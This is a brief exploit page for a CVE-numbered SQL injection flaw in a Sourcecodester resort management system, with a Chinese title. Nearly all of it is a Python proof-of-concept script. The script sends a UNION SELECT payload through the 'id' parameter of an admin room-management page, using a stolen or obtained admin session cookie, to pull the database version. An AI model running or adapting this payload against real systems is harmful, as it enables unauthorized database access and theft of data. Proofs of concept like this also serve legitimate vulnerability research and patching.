CVE-2026-36941 Sourcecodester 度假村管理系统 SQL注入漏洞

import requests # Basic PoC for CVE-2026-36941 # Note: Requires high privilege (admin) session. target_url = "http://target_host/orms/admin/rooms/manage_room.php" # Attacker's session cookie (obtained after login) cookies = { "PHPSESSID": "admin_session_id_here" } # Malicious payload to extract database version # Assuming the vulnerable parameter is 'id' payload = { "id": "1 UNION SELECT 1, version(), 3, 4, 5-- -" } try: response = requests.get(target_url, params=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Check response content for database version output.") # print(response.text) # Uncomment for debugging else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")